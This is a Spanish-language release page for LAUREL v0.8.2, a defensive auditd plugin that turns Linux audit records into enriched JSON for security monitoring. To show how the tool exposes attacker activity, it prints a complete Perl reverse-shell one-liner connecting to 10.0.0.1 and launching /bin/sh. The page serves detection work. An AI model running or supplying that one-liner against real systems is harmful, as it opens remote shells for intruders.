Volver a actualizaciones
Nuevo releaseJul 17, 2026

laurel v0.8.2

Transforma los registros de auditoría de Linux para uso en SIEM

Compartir

logotipo

Linux Audit – Registro utilizable, robusto y fácil

Build Status

LAUREL es un complemento de postprocesamiento de eventos para auditd(8) que genera registros de auditoría JSON enriquecidos y útiles, adecuados para configuraciones modernas de monitoreo de seguridad.

La documentación correspondiente a la última versión estable se puede encontrar aquí.

¿Por qué?

TLDR: En lugar de eventos de auditoría que se ven así…

type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

LAUREL los convierte en registros JSON donde el desorden que los atacantes/probadores de penetración/equipos rojos intentan crear se vuelve evidente de un vistazo:

{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}

Esto ocurre en el origen porque LAUREL se ejecuta en el host donde se generan los eventos de auditoría. Los eventos se enriquecen con información útil sobre el proceso padre (ppid):

"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}

Documentación

Los detalles de configuración y operación se describen en la página de manual laurel(8). Los detalles sobre el formato de registro y las razones se pueden encontrar en la página de manual laurel-about(7). La página laurel-audit-rules(7) contiene consejos y ejemplos para configurar reglas de auditoría útiles para detectar las tácticas de los atacantes.

Las instrucciones de instalación de LAUREL contienen instrucciones sobre cómo compilar LAUREL desde el código fuente y cómo instalarlo y configurarlo.

Desarrollamos LAUREL porque no estábamos contentos con los conjuntos de características y las características de rendimiento de los proyectos y productos existentes. Consulte el documento Rendimiento para obtener más detalles.

Ver también

Licencia

GNU General Public License, versión 3

Autores

El logotipo fue creado por Birgit Meyer <[email protected]>.

Categorías